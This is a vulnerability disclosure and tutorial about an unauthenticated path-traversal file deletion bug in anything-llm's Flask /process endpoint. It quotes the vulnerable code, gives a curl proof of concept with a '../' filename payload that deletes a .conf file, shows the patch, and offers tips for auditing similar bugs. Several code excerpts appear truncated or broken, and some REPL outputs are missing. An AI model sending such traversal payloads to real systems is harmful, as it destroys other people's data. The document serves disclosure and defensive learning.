

This vulnerability was reported on by CharlB, this affects the [anything-llm] web application which setups an API on port 8888. This API is built using python and flask and contains a vulnerability allowing any unauthenticated user to delete any arbitrary file by sending a POST request to /process endpoint.

How to Identify Similar vulnerabilities

Arbitrary File Deletion via Unvalidated Filename Input in /process Endpoint

Taking a quick look at how the API processes this request:

from import process_single


@api.route('/process', methods=['POST'])
def process_file():
  content = request.json
  target_filename = content.get('filename')
  print(f"Processing {target_filename}")
  success, reason = process_single(WATCH_DIRECTORY, target_filename)
  return json.dumps({'filename': target_filename, 'success': success, 'reason': reason})

A very high level overview of this is that the application parses the JSON data containing the filename object and pass it to the process_single function.

import os
from .filetypes import FILETYPES
from .utils import move_source


# This script will do a one-off processing of a specific document that exists in hotdir.
# For this function we remove the original source document since there is no need to keep it and it will
# only occupy additional disk space.
def process_single(directory, target_doc):
  if os.path.isdir(f"{directory}/{target_doc}") or target_doc in RESERVED: return (False, "Not a file")
  if os.path.exists(f"{directory}/{target_doc}") is False: 
    print(f"{directory}/{target_doc} does not exist.")
    return (False, f"{directory}/{target_doc} does not exist.")

  filename, fileext = os.path.splitext(target_doc)
  if filename in ['.DS_Store'] or fileext == '': return False
  if fileext == '.lock':
    print(f"{filename} is locked - skipping until unlocked")
    return (False, f"{filename} is locked - skipping until unlocked")

  if fileext not in FILETYPES.keys():
    print(f"{fileext} not a supported file type for conversion. It will not be processed.")
    move_source(new_destination_filename=target_doc, failed=True, remove=True)
    return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")

    remove_on_complete=True # remove source document to save disk space.

  return (True, None)

The process_single function as shown above performs some basic check such as checking if the specified file exists on the system or not. It also checks if any of the requested file is a locked file, if it is just skip the processing. There's a special case that if a requested file is not in the allowed extension it attempt to move the requested file to a different directory i.e. failed or processed. As seen below, following piece of code handles the restricted extension in the requested file and call move_source function with failed and remove both set to True and target_doc parameter which is the specified file we sent via JSON body i.e. filename

if fileext not in FILETYPES.keys():
    print(f"{fileext} not a supported file type for conversion. It will not be processed.")
    move_source(new_destination_filename=target_doc, failed=True, remove=True)
    return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")

Checking move_source function, we see that if the remove and failed is set to True it will call os.remove with new_destination_filename as parameter which was filename in the previous code where this function was called.

def move_source(working_dir='hotdir', new_destination_filename='', failed=False, remove=False):
  if remove and os.path.exists(f"{working_dir}/{new_destination_filename}"):
    print(f"{new_destination_filename} deleted from filesystem")

Proof of Concept

Coming to the vulnerability, as you may have noticed that the application doesn't have any logic to check for path traversal or input sanitization on the filename parameter. The thing is there's a limited impact but if done cleverly the impact is high, for instance we cannot trigger the vulnerability if the filename doesn't have an extension or if the extension is in allowed list as it will not trigger the move_source trigger to perform deletion. So, if we give something like ../../../../../../../etc/passwd it won't work as the file does not have an extension but giving something like ../../../../../../etc/resolv.conf as it will trigger the move_source function because .conf extension isn't allowed.

The reason we are using ../ is because os.remove(f"{working_dir}/{new_destination_filename}") also takes working_dir which is hotdir into consideration

In this case, I will create a file name resolv.conf in /tmp folder and will attempt to delete it:

ζ cp /etc/resolv.conf . 
ζ ls -la resolv.conf 
-rw-r--r-- 1 root root 53 Nov  3 00:30 resolv.conf
ζ curl -X POST -H 'Content-Type: application/json' -d '{"filename":"../../../../../../../tmp/resolv.conf"}' http://localhost:5000/process
{"filename": "../../../../../../../tmp/resolv.conf", "reason": ".conf not a supported file type for conversion. It will not be processed.", "success": false}

Checking the API logs:

 * Serving Flask app 'api'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on
Press CTRL+C to quit
Processing ../../../../../../../tmp/resolv.conf
.conf not a supported file type for conversion. It will not be processed.
../../../../../../../tmp/resolv.conf deleted from filesystem - - [03/Nov/2023 00:30:48] "POST /process HTTP/1.1" 200 -

The file is successfully deleted from the system.

ζ ls -la resolv.conf
ls: cannot access 'resolv.conf': No such file or directory


A commit was made to the repository to patch this vulnerability and the patched code now sanitizes the specified parameter for any potential of directory traveral:

import os
from flask import Flask, json, request
from import process_single
from import ACCEPTED_MIMES

@api.route('/process', methods=['POST'])
def process_file():
  content = request.json
  target_filename = os.path.normpath(content.get('filename')).lstrip(os.pardir + os.sep)
  print(f"Processing {target_filename}")
  success, reason = process_single(WATCH_DIRECTORY, target_filename)
  return json.dumps({'filename': target_filename, 'success': success, 'reason': reason})

If we see how the modified code is dealing with the payloads that was used to traverse:

>>> os.pardir
>>> os.pardir + os.sep
>>> os.pardir + os.sep
>>> target_filename = os.path.normpath("../../../../../../../password").lstrip(os.pardir + os.sep)
>>> target_filename
>>> target_filename = os.path.normpath("../../../../../../../password../../../../../").lstrip(os.pardir + os.sep)
>>> target_filename

How to Idenitfy Similar Vulnerabilities?

This vulnerability is a cause of improper input validation although it is important to look into the fact how the application process things like files especially if it can somewhow be controlled. Another thing that makes this vulnerability of higher impact is that /process action can be perform unauthenticated, it is important to have some form of authentication if a critical action like this is being offered by API. The best way to look for these kind of vulnerabilities is to see all the file-based actions that application is performing and if we can control any aspect of this process. It is better to narrow it down to functions which handle file-based operations, some of them are listed below:

It is not an exhaustive list as anyone can write their own functions which may be a wrapper around following functions or others.

  • open()

  • close()

  • read()

  • write()

  • readline()

  • seek()

  • tell()

  • flush()


  • os

  • shutil

  • pathlib

  • io

  • csv

  • json

Last updated